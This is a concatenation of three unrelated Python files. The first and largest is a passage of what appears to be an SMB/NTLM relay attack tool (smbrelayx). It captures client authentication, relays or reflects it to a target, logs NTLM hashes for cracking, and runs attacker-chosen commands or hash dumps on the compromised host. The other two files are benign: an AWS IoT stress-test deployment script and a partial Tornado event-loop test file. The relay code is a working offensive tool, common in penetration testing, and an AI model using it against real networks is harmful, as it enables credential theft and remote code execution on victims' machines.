smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen if the target connects back before a previous connection has finished, we might
# get to this function w/o having the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies return status after successful relayed authentication to return
# to the connecting client. This comes useful when we don't want the connecting
# client to store successful credentials in his memory. Valid statuses:
# STATUS_SUCCESS - denotes that the connecting client passed valid credentials,
# which will make him store them accordingly.
# STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin,
# and got configured Remote UAC, thus preventing connection to ADMIN$
# STATUS_LOGON_FAILURE - which will tell the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbrelayx.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
deploy_agent.py
|
import argparse
import boto3
import configparser
import fileinput
import json
import logging
import os
import psutil
import re
import sys
import time
import uuid
from multiprocessing import Process
from shutil import copyfile
from daemon import Daemon
class DeviceDaemon(Daemon):
def run (self):
os.chdir(os.path.dirname(self.exefile))
os.system('./%s' % os.path.basename(self.exefile))
def run_client(exefile_path):
daemon = DeviceDaemon('/tmp/%s.pid' % os.path.basename(exefile_path), exefile_path)
daemon.start()
def init_config(path):
if os.path.isfile(path):
config = configparser.ConfigParser()
config.read(path)
return config
def init_iot_client(credential):
return boto3.client(
'iot',
aws_access_key_id=credential['awsAccessKeyId'],
aws_secret_access_key=credential['awsSecretAccessKey'],
region_name=credential['region']
)
def build_and_run_client(iotClient, iotConfig):
#create test policy
try:
iotClient.get_policy(
policyName=iotConfig['devicePolicy']
)
except iotClient.exceptions.ResourceNotFoundException as e:
logging.info('Create test policy %s', iotConfig['devicePolicy'])
iotClient.create_policy(
policyName=iotConfig['devicePolicy'],
policyDocument=json.dumps({
'Version': '2012-10-17',
'Statement': [{
'Effect': 'Allow',
'Action': 'iot:*',
'Resource': '*'
}]
})
)
# create test thing group
try:
iotClient.describe_thing_group(thingGroupName=iotConfig['thingGroup'])
except iotClient.exceptions.ResourceNotFoundException as e:
logging.info('Create test thing group %s', iotConfig['thingGroup'])
iotClient.create_thing_group(thingGroupName=iotConfig['thingGroup'])
# create thing
client_id = str(uuid.uuid4())
thing_name = 'stressTest_%s' % client_id
iotClient.create_thing(thingName=thing_name)
iotClient.add_thing_to_thing_group(
thingGroupName=iotConfig['thingGroup'], thingName=thing_name
)
resp = iotClient.create_keys_and_certificate(setAsActive=True)
certificateArn = resp['certificateArn']
thing_cert = '%s/%s.pem.crt' % (iotConfig['thingCertDir'], client_id)
thing_key = '%s/%s.pem.key' % (iotConfig['thingCertDir'], client_id)
with open(thing_cert, 'w') as f:
f.write(resp['certificatePem'])
with open(thing_key, 'w') as f:
f.write(resp['keyPair']['PrivateKey'])
rootCAPath = '%s/%s' % (iotConfig['thingCertDir'], os.path.basename(iotConfig['rootCA']))
copyfile(iotConfig['rootCA'], rootCAPath)
iotClient.attach_thing_principal(
thingName=thing_name,
principal=certificateArn
)
iotClient.attach_policy(
policyName=iotConfig['devicePolicy'],
target=certificateArn
)
endpoint = iotClient.describe_endpoint(endpointType='iot:Data-ATS')['endpointAddress']
# change config
configs_map = {
'AWS_IOT_MQTT_HOST': 'AWS_IOT_MQTT_HOST "%s"' % endpoint,
'AWS_IOT_MQTT_CLIENT_ID': 'AWS_IOT_MQTT_CLIENT_ID "%s"' % client_id,
'AWS_IOT_MY_THING_NAME': 'AWS_IOT_MY_THING_NAME "%s"' % thing_name,
'AWS_IOT_ROOT_CA_FILENAME': 'AWS_IOT_ROOT_CA_FILENAME "%s"' % os.path.basename(rootCAPath),
'AWS_IOT_CERTIFICATE_FILENAME': 'AWS_IOT_CERTIFICATE_FILENAME "%s"' % os.path.basename(thing_cert),
'AWS_IOT_PRIVATE_KEY_FILENAME': 'AWS_IOT_PRIVATE_KEY_FILENAME "%s"' % os.path.basename(thing_key)
}
for line in fileinput.input(iotConfig['iotConfigPath'], inplace=True):
for src, dest in configs_map.items():
if src in line:
line = re.sub(src + '.*', dest, line)
break
sys.stdout.write(line)
# build
work_dir = os.getcwd()
sample_dir = os.path.dirname(iotConfig['iotConfigPath'])
sample_name = os.path.basename(sample_dir)
os.chdir(sample_dir)
os.system('make')
os.rename(sample_name, client_id)
# run
os.chdir(work_dir)
exefile_path = os.path.join(work_dir, sample_dir, client_id)
p = Process(target=run_client, args=(exefile_path,))
p.start()
p.join()
return client_id
def clean(iotClient, iotConfig, all=True, number=0):
resp = iotClient.list_things_in_thing_group(thingGroupName=iotConfig['thingGroup'])
things = resp['things']
while 'nextToken' in resp:
resp = iotClient.list_things_in_thing_group(
thingGroupName=iotConfig['thingGroup'],
nextToken=resp['nextToken']
)
things.extend(resp['things'])
sample_dir = os.path.dirname(iotConfig['iotConfigPath'])
for thing_name in things:
resp = iotClient.list_thing_principals(
thingName=thing_name
)
certificateIds = []
for principal in resp['principals']:
certificateId = principal.split('/')[-1]
certificateIds.append(certificateId)
iotClient.detach_policy(
policyName=iotConfig['devicePolicy'], target=principal
)
iotClient.update_certificate(
certificateId=certificateId, newStatus='INACTIVE'
)
iotClient.detach_thing_principal(
thingName=thing_name,
principal=principal
)
# wait for detach finish
while True:
resp = iotClient.list_thing_principals(
thingName=thing_name
)
if not resp['principals']:
break
time.sleep(1)
for certificateId in certificateIds:
iotClient.delete_certificate(certificateId=certificateId, forceDelete=True)
iotClient.delete_thing(thingName=thing_name)
client_id = thing_name.split('_', 1)[-1]
try:
os.remove('%s/%s.pem.crt' % (iotConfig['thingCertDir'], client_id))
os.remove('%s/%s.pem.key' % (iotConfig['thingCertDir'], client_id))
os.remove('%s/%s' % (sample_dir, client_id))
except OSError as e:
logging.warn('Failed to remove device credentials %s', str(e))
for proc in psutil.process_iter():
if proc.name() == client_id:
proc.kill()
pidfile = '/tmp/%s.pid' % client_id
if os.path.exists(pidfile):
os.remove(pidfile)
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ini", action="store", required=True, dest="ini", help="config file path")
parser.add_argument("-a", "--action", action="store", required=True, dest="action", help="deploy or clean")
parser.add_argument("-n", "--number", action="store", type=int, dest="number", help="number of devices")
args = parser.parse_args()
number = args.number
config = init_config(args.ini)
client_limit = int(config['IOT']['clientLimit'])
if args.action == 'deploy':
if not number:
msg = 'Need to specify number of device to deploy'
logging.error(msg)
raise Exception(msg)
elif number > client_limit:
msg = 'Exceed limit %s. Expect deploy %d devices.' % (number, client_limit)
logging.error(msg)
raise Exception(msg)
iotClient = init_iot_client(config['CREDENTIAL'])
for _ in range(number):
build_and_run_client(iotClient, config['IOT'])
elif args.action == 'clean':
iotClient = init_iot_client(config['CREDENTIAL'])
clean(iotClient, config['IOT'])
|
ioloop_test.py
|
from concurrent.futures import ThreadPoolExecutor
from concurrent import futures
import contextlib
import datetime
import functools
import socket
import subprocess
import sys
import threading
import time
import types
from unittest import mock
import unittest
from tornado.escape import native_str
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError, PeriodicCallback
from tornado.log import app_log
from tornado.testing import AsyncTestCase, bind_unused_port, ExpectLog, gen_test
from tornado.test.util import skipIfNonUnix, skipOnTravis
import typing
if typing.TYPE_CHECKING:
from typing import List # noqa: F401
class TestIOLoop(AsyncTestCase):
def test_add_callback_return_sequence(self):
# A callback returning {} or [] shouldn't spin the CPU, see Issue #1803.
self.calls = 0
loop = self.io_loop
test = self
old_add_callback = loop.add_callback
def add_callback(self, callback, *args, **kwargs):
test.calls += 1
old_add_callback(callback, *args, **kwargs)
loop.add_callback = types.MethodType(add_callback, loop)
loop.add_callback(lambda: {})
loop.add_callback(lambda: [])
loop.add_timeout(datetime.timedelta(milliseconds=50), loop.stop)
loop.start()
self.assertLess(self.calls, 10)
@skipOnTravis
def test_add_callback_wakeup(self):
# Make sure that add_callback from inside a running IOLoop
# wakes up the IOLoop immediately instead of waiting for a timeout.
def callback():
self.called = True
self.stop()
def schedule_callback():
self.called = False
self.io_loop.add_callback(callback)
# Store away the time so we can check if we woke up immediately
self.start_time = time.time()
self.io_loop.add_timeout(self.io_loop.time(), schedule_callback)
self.wait()
self.assertAlmostEqual(time.time(), self.start_time, places=2)
self.assertTrue(self.called)
@skipOnTravis
def test_add_callback_wakeup_other_thread(self):
def target():
# sleep a bit to let the ioloop go into its poll loop
time.sleep(0.01)
self.stop_time = time.time()
self.io_loop.add_callback(self.stop)
thread = threading.Thread(target=target)
self.io_loop.add_callback(thread.start)
self.wait()
delta = time.time() - self.stop_time
self.assertLess(delta, 0.1)
thread.join()
def test_add_timeout_timedelta(self):
self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop)
self.wait()
def test_multiple_add(self):
sock, port = bind_unused_port()
try:
self.io_loop.add_handler(
sock.fileno(), lambda fd, events: None, IOLoop.READ
)
# Attempting to add the same handler twice fails
# (with a platform-dependent exception)
self.assertRaises(
Exception,
self.io_loop.add_handler,
sock.fileno(),
lambda fd, events: None,
IOLoop.READ,
)
finally:
self.io_loop.remove_handler(sock.fileno())
sock.close()
def test_remove_without_add(self):
# remove_handler should not throw an exception if called on an fd
# was never added.
sock, port = bind_unused_port()
try:
self.io_loop.remove_handler(sock.fileno())
finally:
sock.close()
def test_add_callback_from_signal(self):
# cheat a little bit and just run this normally, since we can't
# easily simulate the races that happen with real signal handlers
self.io_loop.add_callback_from_signal(self.stop)
self.wait()
def test_add_callback_from_signal_other_thread(self):
# Very crude test, just to make sure that we cover this case.
# This also happens to be the first test where we run an IOLoop in
# a non-main thread.
other_ioloop = IOLoop()
thread = threading.Thread(target=other_ioloop.start)
thread.start()
other_ioloop.add_callback_from_signal(other_ioloop.stop)
thread.join()
other_ioloop.close()
def test_add_callback_while_closing(self):
# add_callback should not fail if it races with another thread
# closing the IOLoop. The callbacks are dropped silently
# without executing.
closing = threading.Event()
def target():
other_ioloop.add_callback(other_ioloop.stop)
other_ioloop.start()
closing.set()
other_ioloop.close(all_fds=True)
other_ioloop = IOLoop()
thread = threading.Thread(target=target)
thread.start()
closing.wait()
for i in range(1000):
other_ioloop.add_callback(lambda: None)
@skipIfNonUnix # just because socketpair is so convenient
def test_read_while_writeable(self):
# Ensure that write events don't come in while we're waiting for
# a read and haven't asked for writeability. (the reverse is
# difficult to test for)
client, server = socket.socketpair()
try:
def handler(fd, events):
self.assertEqual(events, IOLoop.READ)
self.stop()
self.io_loop.add_handler(client.fileno(), handler, IOLoop.READ)
self.io_loop.add_timeout(
self.io_loop.time() + 0.01, functools.partial(server.send, b"asdf")
)
self.wait()
self.io_loop.remove_handler(client.fileno())
finally:
client.close()
server.close()
def test_remove_timeout_after_fire(self):
# It is not an error to call remove_timeout after it has run.
handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop)
self.wait()
self.io_loop.remove_timeout(handle)
def test_remove_timeout_cleanup(self):
# Add and remove enough callbacks to trigger cleanup.
# Not a very thorough test, but it ensures that the cleanup code
# gets executed and doesn't blow up. This test is only really useful
# on PollIOLoop subclasses, but it should run silently on any
# implementation.
for i in range(2000):
timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600, lambda: None)
self.io_loop.remove_timeout(timeout)
# HACK: wait two IOLoop iterations for the GC to happen.
self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop))
self.wait()
def test_remove_timeout_from_timeout(self):
calls = [False, False]
# Schedule several callbacks and wait for them all to come due at once.
# t2 should be cancelled by t1, even though it is already scheduled to
# be run before the ioloop even looks at it.
now = self.io_loop.time()
def t1():
calls[0] = True
self.io_loop.remove_timeout(t2_handle)
self.io_loop.add_timeout(now + 0.01, t1)
def t2():
calls[1] = True
t2_handle = self.io_loop.add_timeout(now + 0.02, t2)
self.io_loop.add_timeout(now + 0.03, self.stop)
time.sleep(0.03)
self.wait()
self.assertEqual(calls, [True, False])
def test_timeout_with_arguments(self):
# This tests that all the timeout methods pass through *args correctly.
results = [] # type: List[int]
self.io_loop.add_timeout(self.io_loop.time(), results.append, 1)
self.io_loop.add_timeout(datetime.timedelta(seconds=0), results.append, 2)
self.io_loop.call_at(self.io_loop.time(), results.append, 3)
self.io_loop.call_later(0, results.append, 4)
self.io_loop.call_later(0, self.stop)
self.wait()
# The asyncio event loop does not guarantee the order of these
# callbacks.
self.assertEqual(sorted(results), [1, 2, 3, 4])
def test_add_timeout_return(self):
# All the timeout methods return non-None handles that can be
# passed to remove_timeout.
handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_at_return(self):
handle = self.io_loop.call_at(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_later_return(self):
